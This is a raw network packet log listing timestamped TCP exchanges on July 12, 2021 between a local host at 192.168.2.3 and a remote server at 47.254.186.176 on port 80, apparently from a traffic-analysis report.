Jul 12, 2021 10:28:46.468192101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468214035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468225002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468271971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468300104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468324900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468348980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468367100 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468381882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468420982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468430996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468455076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468477964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468502998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468545914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468570948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468594074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468602896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468626022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468650103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468703032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468729019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468766928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468806028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468817949 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468837976 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468852997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468879938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468904972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468915939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468940973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468962908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.468975067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.468998909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469019890 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469053984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469079018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469108105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469134092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469144106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469155073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469180107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469202995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469228983 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469238997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469264030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469286919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469300032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469325066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469352007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469358921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469383955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469397068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469424963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469449997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469474077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469501972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469508886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469535112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469546080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469569921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469585896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469604015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469628096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469650030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469657898 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469680071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469695091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469732046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469767094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469791889 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469878912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.469926119 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.469975948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470000982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470026016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470052958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470061064 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470082998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470102072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470113993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470156908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470185995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470207930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470231056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470252037 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470263004 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470288038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470313072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470319033 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470340014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470356941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470370054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470390081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470415115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470422029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470459938 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470482111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470504999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470525026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470550060 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470706940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470757008 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.470880032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470937014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470972061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.470988989 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471080065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471138954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471168041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471190929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471213102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471232891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471244097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471263885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471281052 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471296072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471317053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471342087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471348047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471370935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471383095 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471402884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471424103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471453905 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471478939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471524000 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471535921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471558094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471579075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471605062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471787930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471843958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471896887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471919060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471944094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.471970081 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.471980095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472023010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472034931 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472075939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472104073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472121954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472183943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472230911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472382069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472409010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472434998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472456932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472476006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472500086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472522974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472529888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472572088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472587109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472611904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472661018 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472681999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472745895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472785950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472795963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472820997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472846985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472872019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472908974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472932100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472954035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.472963095 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.472984076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473009109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473058939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473081112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473109007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473167896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473192930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473221064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473229885 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473256111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473270893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473292112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473320961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473335981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473376036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473400116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473423958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473448992 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473476887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473506927 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473520994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473550081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473570108 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473588943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473627090 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473691940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473766088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473790884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473814964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473824024 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473844051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473864079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.473874092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.473921061 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474148989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474175930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474200010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474230051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474236012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474261045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474275112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474297047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474322081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474347115 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474359035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474386930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474406958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474453926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474493027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474505901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474524975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474545956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474569082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474606037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474632025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474653006 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474668980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474714041 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474781036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474858046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474891901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474906921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474927902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474951029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.474972963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.474987030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475013018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475035906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475044012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475066900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475087881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475096941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475136042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475193977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475219011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475243092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475260019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475505114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475536108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475565910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475594997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475615978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475635052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475646973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475670099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475686073 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475701094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475722075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475742102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475754023 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475773096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475794077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475804090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475843906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475873947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475894928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475914955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475934982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.475944042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.475986958 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.476027012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476063013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476108074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.476138115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476161957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476181984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476208925 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.476342916 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476372957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476392984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476402998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.476442099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.476465940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476486921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476521969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476547003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476555109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.476577044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476588964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.476815939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476839066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476860046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476871967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.476892948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.476902008 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477011919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477058887 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477101088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477135897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477180958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477189064 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477212906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477236032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477255106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477385044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477410078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477433920 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477456093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477507114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477514029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477535963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477556944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477579117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477598906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477619886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477643967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477648020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477658033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477679014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477696896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477739096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477750063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477771997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477816105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477870941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477895975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477917910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477946043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477952957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.477979898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.477989912 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478013992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478035927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.478060007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.478070021 CEST	80	49720	47.254.186.176	192.168.2.3
